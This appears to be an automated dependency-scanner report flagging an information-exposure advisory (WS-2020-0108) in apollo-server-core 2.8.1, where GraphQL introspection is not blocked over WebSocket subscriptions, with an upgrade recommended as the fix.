Apollo-server-core before 2.4.12 is vulnerable to Information Exposure. The package does not properly enforce validation rules when creating subscription servers, which includes a NoInstrospection rule for the Websocket. This leaks the GraphQL schema types, their relations and human-readable names.
Core engine for Apollo GraphQL server
Library home page: https://registry.npmjs.org/apollo-server-core/-/apollo-server-core-2.8.1.tgz
Found in HEAD commit: d3aa03c77002ed1f61a679726c02bc0494d073c2
Vulnerabilities
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
WS-2020-0108
### Vulnerable Library - apollo-server-core-2.8.1.tgzCore engine for Apollo GraphQL server
Library home page: https://registry.npmjs.org/apollo-server-core/-/apollo-server-core-2.8.1.tgz
Dependency Hierarchy: - :x: **apollo-server-core-2.8.1.tgz** (Vulnerable Library)
Found in HEAD commit: d3aa03c77002ed1f61a679726c02bc0494d073c2
Found in base branch: main
### Vulnerability DetailsApollo-server-core before 2.4.12 is vulnerable to Information Exposure. The package does not properly enforce validation rules when creating subscription servers, which includes a NoInstrospection rule for the Websocket. This leaks the GraphQL schema types, their relations and human-readable names.
Publish Date: 2020-06-05
URL: WS-2020-0108
### CVSS 3 Score Details (5.4)Base Score Metrics: - Exploitability Metrics: - Attack Vector: N/A - Attack Complexity: N/A - Privileges Required: N/A - User Interaction: N/A - Scope: N/A - Impact Metrics: - Confidentiality Impact: N/A - Integrity Impact: N/A - Availability Impact: N/A
For more information on CVSS3 Scores, click here. ### Suggested FixType: Upgrade version
Origin: https://github.com/advisories/GHSA-w42g-7vfc-xf37
Release Date: 2020-06-05
Fix Resolution: 2.14.2